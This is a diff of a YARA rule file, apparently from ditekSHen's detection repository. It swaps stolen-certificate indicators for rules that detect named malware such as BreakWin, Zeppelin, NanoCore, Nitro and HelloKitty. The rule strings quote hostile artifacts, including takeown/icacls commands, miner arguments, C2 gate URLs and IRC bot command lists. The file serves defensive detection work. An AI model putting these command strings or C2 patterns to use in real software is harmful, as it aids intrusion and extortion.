+		$x1 = "\\HorusEyesRat-" ascii
+		$x2 = "\\HorusEyesRat.pdb" ascii
+		$x3 = "get_horus_eye" ascii
+		$s1 = "get_Type_Packet" fullword ascii
+		$s2 = "PacketLib" fullword ascii nocase
+		$s3 = "System.Net.Sockets" fullword ascii
+		$s4 = "PROCESS_MODE_BACKGROUND_BEGIN" fullword ascii
+		$s5 = "EXECUTION_STATE" fullword ascii
+		$s6 = /Plugins\\[A-Z]{2}.dll/ fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Umbrella LLC" and pe.signatures [ i ] . serial == "12:49:aa:2a:da:49:67:96:9b:71:ce:63:bf:18:7c:38" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or ( 4 of ( $s* ) and #s6 > 4 ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2Dcd0699Da08915Dde6D044Cb474157C : FILE
+rule DITEKSHEN_MALWARE_Win_Breakwin : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BreakWin Wiper"
 		author = "ditekSHen"
-		id = "0b4e1d10-d385-5ca8-b9e2-00341a4c6fd9"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "4ffadbfa-c1cc-59e6-a9ba-7a34eca6c3fe"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2495-L2506"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7453-L7471"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "096cf4bb17aa86821bd8d6c8b9fd603664beb12f54a97a87e660b560bd0fc246"
+		logic_hash = "86fc89e28fc107c2d4fe98dc16048d9e076b1fef53a3df0814f80a88bbe09c48"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "13bf3156e66a57d413455973866102b0a1f6d45a1e6de050ca9dcf16ecafb4e2"
-		importance = 20
+
+	strings:
+		$s1 = "Started wiping file %s with %s." fullword wide
+		$s2 = "C:\\Program Files\\Lock My PC" wide
+		$s3 = "Stardust is still alive." fullword wide
+		$s4 = "Failed to terminate the locker process." fullword wide
+		$s5 = "C:\\Windows\\System32\\cmd.exe" fullword wide
+		$s6 = "Process created successfully. Executed command: %s." fullword wide
+		$s7 = "locker_background_image_path" fullword ascii
+		$s8 = "takeown.exe /F \"C:\\Windows\\Web\\Screen\" /R /A /D Y" fullword ascii
+		$s9 = "icacls.exe \"C:\\Windows\\Web\\Screen\" /reset /T" fullword ascii
+		$s10 = "takeown.exe /F \"C:\\ProgramData\\Microsoft\\Windows\\SystemData\" /R /A /D Y" fullword ascii
+		$s11 = ".?AVProcessSnapshotCreationFailedException@@" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VENTE DE TOUT" and pe.signatures [ i ] . serial == "2d:cd:06:99:da:08:91:5d:de:6d:04:4c:b4:74:15:7c" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_008D52Fb12A2511E86Bbb0Ba75C517Eab0 : FILE
+rule DITEKSHEN_MALWARE_Win_Coinminer03 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects coinmining malware"
 		author = "ditekSHen"
-		id = "04b78a1c-bb2c-5844-933b-f95a0cc8c71e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "e0e57557-7c46-5336-b904-c4c1f142bd81"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2508-L2519"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7506-L7528"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "23dc0500af88af0e2c8ea7ff2c5a149d24fb7fd23853c4bf5ee5921a66a34672"
+		logic_hash = "f22e1af955a0d132dda820fe5e5e1ae2f077b7264ce1f0125a2f37c0da6b6508"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9e918ce337aebb755e23885d928e1a67eca6823934935010e82b561b928df2f9"
-		importance = 20
+
+	strings:
+		$s1 = "UnVzc2lhbiBTdGFuZGFyZCBUaW1l" wide
+		$s2 = "/xmrig" wide
+		$s3 = "/gminer" wide
+		$s4 = "-o {0} -u {1} -p {2} -k --cpu-priority 0 --threads={3}" wide
+		$s5 = "--algo ethash --server" wide
+		$s6 = "--algo kawpow --server" wide
+		$cnc1 = "/delonl.php?hwid=" fullword wide
+		$cnc2 = "/gateonl.php?hwid=" fullword wide
+		$cnc3 = "&cpuname=" fullword wide
+		$cnc4 = "&gpuname=" fullword wide
+		$cnc5 = "{0}/gate.php?hwid={1}&os={2}&cpu={3}&gpu={4}&dateinstall={5}&gpumem={6}" fullword wide
+		$cnc6 = "/del.php?hwid=" fullword wide
+		$f1 = "<StartGpuethGminer>b__" ascii
+		$f2 = "<StartGpuetcGminer>b__" ascii
+		$f3 = "<StartGpurvnGminer>b__" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VThink Software Consulting Inc." and pe.signatures [ i ] . serial == "00:8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $cnc* ) or ( 2 of ( $f* ) and ( 1 of ( $s* ) or 1 of ( $f* ) ) ) or all of ( $f* ) or 5 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00B1Aea98Bf0Ce789B6C952310F14Edde0 : FILE
+rule DITEKSHEN_MALWARE_Win_Zeppelin : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Zeppelin (Delphi) ransomware"
 		author = "ditekSHen"
-		id = "9ab5382f-d768-553c-b52c-88d3a3824459"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "368d0c31-745d-50ad-a265-50561fdc822a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2521-L2532"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7530-L7545"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f7e8a4a0dcd952129e24e8e9351f271d7ea98ffcb7ef9ebe65c27dcc62e6a820"
+		logic_hash = "f6c8420756b562662985dd26eaad58500a24cae786a47b788c953e86276116a1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "28324a9746edbdb41c9579032d6eb6ab4fd3e0906f250d4858ce9c5fe5e97469"
-		importance = 20
+
+	strings:
+		$s1 = "TUnlockAndEncrypt" ascii
+		$s2 = "TExcludeFiles" ascii
+		$s3 = "TExcludeFolders" ascii
+		$s4 = "TDrivesAndShares" ascii
+		$s5 = "TTaskKiller" ascii
+		$x1 = "!!! D !!!" ascii
+		$x2 = "!!! LOCALPUBKEY !!!" ascii
+		$x3 = "!!! ENCLOCALPRIVKEY !!!" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Absolut LLC" and pe.signatures [ i ] . serial == "00:b1:ae:a9:8b:f0:ce:78:9b:6c:95:23:10:f1:4e:dd:e0" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or all of ( $x* ) or ( 2 of ( $x* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00F097E59809Ae2E771B7B9Ae5Fc3408D7 : FILE
+rule DITEKSHEN_MALWARE_Win_Slackbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SlackBot"
 		author = "ditekSHen"
-		id = "edd8674d-7d45-5f77-aa47-3fbe32176324"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "cd540aa2-dc8f-5ccc-b66c-a8d72b73c896"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2534-L2545"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7547-L7588"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "817876ab8e649b36cac2e7b23d58fe94963c55481fbf3deff7e60a70896af6d0"
+		logic_hash = "919839883c437b69cf7f380830f2499be24415f96f1e42424e4859114f958581"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "22ad7df275c8b5036ea05b95ce5da768049bd2b21993549eed3a8a5ada990b1e"
-		importance = 20
+
+	strings:
+		$x1 = "lp0o4bot v" ascii
+		$x2 = "slackbot " ascii
+		$s1 = "cpu: %lumhz %s, uptime: %u+%.2u:%.2u, os: %s" fullword ascii
+		$s2 = "%s, running for %u+%.2u:%.2u" fullword ascii
+		$s3 = "PONG :%s" fullword ascii
+		$s4 = "PRIVMSG %s :%s" fullword ascii
+		$s5 = "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" fullword ascii
+		$m1 = "saving %s to %s" ascii
+		$m2 = "visit number %u failed" ascii
+		$m3 = "sending %s packets of %s bytes to %s with a delay of %s" ascii
+		$m4 = "file executed" ascii
+		$m5 = "packets sent" ascii
+		$m6 = "upgrading to %s" ascii
+		$m7 = "rebooting..." ascii
+		$c1 = "!@remove" fullword ascii
+		$c2 = "!@restart" fullword ascii
+		$c3 = "!@reboot" fullword ascii
+		$c4 = "!@rndnick" fullword ascii
+		$c5 = "!@exit" fullword ascii
+		$c6 = "!@sysinfo" fullword ascii
+		$c7 = "!@upgrade" fullword ascii
+		$c8 = "!@login" fullword ascii
+		$c9 = "!@run" fullword ascii
+		$c10 = "!@webdl" fullword ascii
+		$c11 = "!@cycle" fullword ascii
+		$c12 = "!@clone" fullword ascii
+		$c13 = "!@visit" fullword ascii
+		$c14 = "!@udp" fullword ascii
+		$c15 = "!@nick" fullword ascii
+		$c16 = "!@say" fullword ascii
+		$c17 = "!@quit" fullword ascii
+		$c18 = "!@part" fullword ascii
+		$c19 = "!@join" fullword ascii
+		$c20 = "!@raw" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABEL RENOVATIONS, INC." and pe.signatures [ i ] . serial == "00:f0:97:e5:98:09:ae:2e:77:1b:7b:9a:e5:fc:34:08:d7" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or all of ( $s* ) or all of ( $m* ) or ( 10 of ( $c* ) and ( 1 of ( $x* ) or 3 of ( $s* ) or 2 of ( $m* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2E8023A5A0328F66656E1Fc251C82680 : FILE
+rule DITEKSHEN_MALWARE_Win_Sweetystealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SweetyStealer"
 		author = "ditekSHen"
-		id = "192695ab-2f38-5a0b-98ba-5c800f6b9ec1"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "21dd1706-2cb5-5b27-ad3a-c3de8e6fb333"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2547-L2558"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7590-L7608"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5f0ff46d6cb2a6fe50a4e433dfbf8f62acd92b7c92d922680894fdaee2558d31"
+		logic_hash = "ecf22240b47af077055260faba0406721f1b4cc5ed04180285df0de86c4e1241"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e3eff064ad23cc4c98cdbcd78e4e5a69527cf2e4"
-		importance = 20
+
+	strings:
+		$s1 = "SWEETY STEALER" wide
+		$s2 = "\\SWEETYLOG.zip" fullword wide
+		$s3 = "\\SWEETY STEALER\\SWEETY\\" ascii
+		$s4 = "\\Sweety" fullword wide
+		$s5 = "SWEETYSTEALER." ascii
+		$s6 = "in Virtual Environment, so we prevented stealing" wide
+		$s7 = ":purple_square:" wide
+		$f1 = "<GetDomainDetect>b__" ascii
+		$f2 = "<GetAllProfiles>b__" ascii
+		$f3 = "<ProcessExtraFieldZip64>b__" ascii
+		$f4 = "<PostExtractCommandLine>k__" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Philippe Mantes" and pe.signatures [ i ] . serial == "2e:80:23:a5:a0:32:8f:66:65:6e:1f:c2:51:c8:26:80" )
+		uint16( 0 ) == 0x5a4d and 3 of ( $s* ) or ( 3 of ( $f* ) and 1 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_38B0Eaa7C533051A456Fb96C4Ecf91C4 : FILE
+rule DITEKSHEN_MALWARE_Win_Genircbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects generic IRCBots"
 		author = "ditekSHen"
-		id = "1133fb37-2616-5d95-83da-554d9a5a5373"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "e1faa1dd-bbf5-5208-97d6-a6e8597d39bc"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2560-L2571"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7610-L7626"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ea8eaf1fc17075a8c1f34f9b1d8a987071d58a4b68bed70db763402a9a6de97"
+		logic_hash = "cc7f4599148c45fdf755c07530ae4846b7e283b5c1001c121f9ea05279997dc1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "8e2e69b1202210dc9d2155a0f974ab8c325d5297"
-		importance = 20
+
+	strings:
+		$s1 = "@login" ascii nocase
+		$s2 = "PRIVMSG" fullword ascii
+		$s3 = "JOIN" fullword ascii
+		$s4 = "PING :" fullword ascii
+		$s5 = "NICK" fullword ascii
+		$s6 = "USER" fullword ascii
+		$x1 = "irc.danger.net" fullword ascii nocase
+		$x2 = "evilBot" fullword ascii nocase
+		$x3 = "#evilChannel" fullword ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Marianne Septier" and pe.signatures [ i ] . serial == "38:b0:ea:a7:c5:33:05:1a:45:6f:b9:6c:4e:cf:91:c4" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 2 of ( $x* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_738Db9460A10Bb8Bc03Dc59Feac3Be5E : FILE
+rule DITEKSHEN_MALWARE_Win_Nitro : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Nitro Ransomware"
 		author = "ditekSHen"
-		id = "3451fe9d-067a-57ea-9df1-35d427d8c71a"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "3edb62e0-0544-5291-a949-a45fdf881c7e"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2573-L2584"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7628-L7652"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6a7060f2a5867e9974cb01de516ef34fb367ef9acf88e2f63c97dd05b1676504"
+		logic_hash = "03da21ece2de530a9c2ba08a9e44c9a92bc9ca0a6d4ac9507899d1f3dcd03e37"
 		score = 75
-		quality = 75
+		quality = 69
 		tags = "FILE"
-		thumbprint = "4cf77e598b603c13cdcd1a676ca61513558df746"
-		importance = 20
+
+	strings:
+		$x1 = ".givemenitro" wide
+		$x2 = "Nitro Ransomware" ascii wide
+		$x3 = "\\NitroRansomware.pdb" ascii
+		$x4 = "NitroRansomware" ascii wide nocase
+		$s1 = "Valid nitro code was received" wide
+		$s2 = "discord nitro" ascii wide nocase
+		$s3 = "Starting file encryption" wide
+		$s4 = "NR_decrypt.txt" wide
+		$s5 = "open it unless you have the decryption key." ascii
+		$s6 = "<EncryptAll>b__" ascii
+		$s7 = "<DecryptAll>b__" ascii
+		$s8 = "DECRYPT_PASSWORD" fullword ascii
+		$s9 = "IsEncrypted" fullword ascii
+		$s10 = "CmdProcess_OutputDataReceived" fullword ascii
+		$s11 = "encryptedFileLog" fullword ascii
+		$s12 = "Encrypting:" fullword wide
+		$s13 = "decryption key. If you do so, your files may get corrupted" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jocelyn Bennett" and pe.signatures [ i ] . serial == "73:8d:b9:46:0a:10:bb:8b:c0:3d:c5:9f:ea:c3:be:5e" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 3 of ( $s* ) and 1 of ( $x* ) ) or ( 7 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_141D6Dafed065980D97520E666493396 : FILE
+rule DITEKSHEN_MALWARE_Win_Nanocore : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects NanoCore"
 		author = "ditekSHen"
-		id = "1a2e44d7-b801-5c3e-bf74-616f211c6d93"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "931b98f6-df2b-538b-bc49-ecbbd24334da"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2586-L2597"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7654-L7681"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "37ed05b7a472ec6cbc1bba453f3be9ca1bd590ed6470d6607873ef52b28e3ea5"
+		logic_hash = "6336260e0af2b4b51338ee066f41b7c58aa134a6c03ca110db7e088edf2b65a7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "28225705d615a47de0d1b0e324b5b9ca7c11ce48"
-		importance = 20
+
+	strings:
+		$x1 = "NanoCore Client" fullword ascii
+		$x2 = "NanoCore.ClientPlugin" fullword ascii
+		$x3 = "NanoCore.ClientPluginHost" fullword ascii
+		$i1 = "IClientApp" fullword ascii
+		$i2 = "IClientData" fullword ascii
+		$i3 = "IClientNetwork" fullword ascii
+		$i4 = "IClientAppHost" fullword ascii
+		$i5 = "IClientDataHost" fullword ascii
+		$i6 = "IClientLoggingHost" fullword ascii
+		$i7 = "IClientNetworkHost" fullword ascii
+		$i8 = "IClientUIHost" fullword ascii
+		$i9 = "IClientNameObjectCollection" fullword ascii
+		$i10 = "IClientReadOnlyNameObjectCollection" fullword ascii
+		$s1 = "ClientPlugin" fullword ascii
+		$s2 = "EndPoint" fullword ascii
+		$s3 = "IPAddress" fullword ascii
+		$s4 = "IPEndPoint" fullword ascii
+		$s5 = "IPHostEntr" fullword ascii
+		$s6 = "get_ClientSettings" fullword ascii
+		$s7 = "get_Connected" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ralph Schmidt" and pe.signatures [ i ] . serial == "14:1d:6d:af:ed:06:59:80:d9:75:20:e6:66:49:33:96" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 8 of ( $i* ) or all of ( $s* ) or ( 1 of ( $x* ) and ( 3 of ( $i* ) or 2 of ( $s* ) ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_07Cf63Bdccc15C55E5Ce785Bdfbeaacf : FILE
+rule DITEKSHEN_MALWARE_Win_Satan : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Satan ransomware"
 		author = "ditekSHen"
-		id = "7bdc16ed-ff95-5e96-bfe9-ad326c77c82a"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "f0a9369e-a3d7-5770-b490-4c9a919abb82"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2599-L2610"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7683-L7709"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1fdd8f6535bf5a78fcd7e33475a650914053f1391fe04f885e9e5a84452bfe5a"
+		logic_hash = "e50daa88e0067a0f00329c6369c0334bd282fb102c91ba5ca770da97851d6d2e"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "3306df7607bed04187d23c1eb93adf2998e51d01"
-		importance = 20
+
+	strings:
+		$s1 = "S:(ML;;NRNWNX;;;LW)" fullword wide
+		$s2 = "recycle.bin" fullword wide
+		$s3 = "tmp_" fullword wide
+		$s4 = "%s%08x.%s" fullword wide
+		$s5 = "\"%s\" %s" fullword wide
+		$s6 = "/c \"%s\"" fullword wide
+		$s7 = "Global\\" fullword wide
+		$s8 = "rd /S /Q \"%s\"" fullword ascii
+		$s9 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)" fullword ascii
+		$e1 = "*pdf*" fullword wide
+		$e2 = "*rtf*" fullword wide
+		$e3 = "*doc*" fullword wide
+		$e4 = "*docx*" fullword wide
+		$e5 = "*xlsx*" fullword wide
+		$e6 = "*pptx*" fullword wide
+		$e7 = "*moneywell*" fullword wide
+		$o1 = { 56 8d 54 24 34 b9 9e f0 ea be e8 c1 f9 ff ff 8d }
+		$o2 = { b9 34 f6 40 00 e8 ea 0b 00 00 85 c0 0f 84 91 }
+		$o3 = { 53 8d 84 24 34 01 00 00 b9 01 00 00 80 50 a1 64 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REITSUPER ESTATE LLC" and pe.signatures [ i ] . serial == "07:cf:63:bd:cc:c1:5c:55:e5:ce:78:5b:df:be:aa:cf" )
+		uint16( 0 ) == 0x5a4d and ( ( 8 of ( $s* ) and 4 of ( $e* ) ) or all of ( $s* ) or ( all of ( $e* ) and 5 of ( $s* ) ) or ( all of ( $o* ) and 8 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0382Cd4B6Ed21Ed7C3Eaea266269D000 : FILE
+rule DITEKSHEN_MALWARE_Win_Neshta : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Neshta"
 		author = "ditekSHen"
-		id = "ad4bc1bc-4d72-51bf-a22c-cd98f33f3931"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "b96ee19e-b631-57fd-bf8a-67d790202c46"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2612-L2623"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7711-L7720"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7e8204f2ec30da73bc2eb83e065412c96e084d7ff5f8ab6125d643693d7407d1"
+		logic_hash = "7967c1154f652e28e541058a7b7f61aa077cfaf6be58282e1de68d9a6088c1ac"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e600612ffcd002718b7d03a49d142d07c5a04154"
-		importance = 20
+
+	strings:
+		$s1 = "Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus." fullword ascii
+		$s2 = "! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LOOK AND FEEL SP Z O O" and pe.signatures [ i ] . serial == "03:82:cd:4b:6e:d2:1e:d7:c3:ea:ea:26:62:69:d0:00" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_08653Ef2Ed9E6Ebb56Ffa7E93F963235 : FILE
+rule DITEKSHEN_MALWARE_Linux_Hellokitty : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Linux version of HelloKitty ransomware"
 		author = "ditekSHen"
-		id = "8883185a-8239-5648-bebc-3a4c3578a7d6"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "bb228937-8cd8-5fb8-aaed-3bd539ae96f2"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L2625-L2636"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L7722-L7746"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b0e35f2dbd27de0dc9ea6ee7958c477e6a154bc4c8bb5484ba85ed5732502645"
+		logic_hash = "bcb1188d616b29fa535e757a37476435a3061d27e143339413f6829876701868"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "1567d022b47704a1fd7ab71ff60a121d0c1df33a"
-		importance = 20
+
+	strings:
+		$s1 = "exec_pipe:%s" ascii
+		$s2 = "Error InitAPI !!!" fullword ascii
+		$s3 = "No Files Found !!!" fullword ascii
+		$s4 = "Error open log File:%s" fullword ascii
+		$s5 = "%ld - Files Found  " fullword ascii
+		$s6 = "Total VM run on host:" fullword ascii
+		$s7 = "error:%d open:%s" fullword ascii
+		$s8 = "work.log" fullword ascii
+		$s9 = "esxcli vm process kill" ascii
+		$s10 = "readdir64" fullword ascii
+		$s11 = "%s_%d.block" fullword ascii
+		$s12 = "EVP_EncryptFinal_ex" fullword ascii
+		$s13 = ".README_TO_RESTORE" fullword ascii
+		$m1 = "COMPROMISED AND YOUR SENSITIVE PRIVATE INFORMATION WAS STOLEN" ascii nocase
+		$m2 = "damage them without special software" ascii nocase
+		$m3 = "leaking or being sold" ascii nocase
+		$m4 = "Data will be Published and/or Sold" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Haw Farm LIMITED" and pe.signatures [ i ] . serial == "08:65:3e:f2:ed:9e:6e:bb:56:ff:a7:e9:3f:96:32:35" )
+		uint16( 0 ) == 0x457f and ( 6 of ( $s* ) or ( 2 of ( $m* ) and 2 of ( $s* ) ) or 8 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Ddce8Cdc91B5B649Bb4B45Ffbba6C6C : FILE
+rule DITEKSHEN_MALWARE_Win_Blackmatter : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects BlackMatter ransomware"
 		author = "ditekSHen"
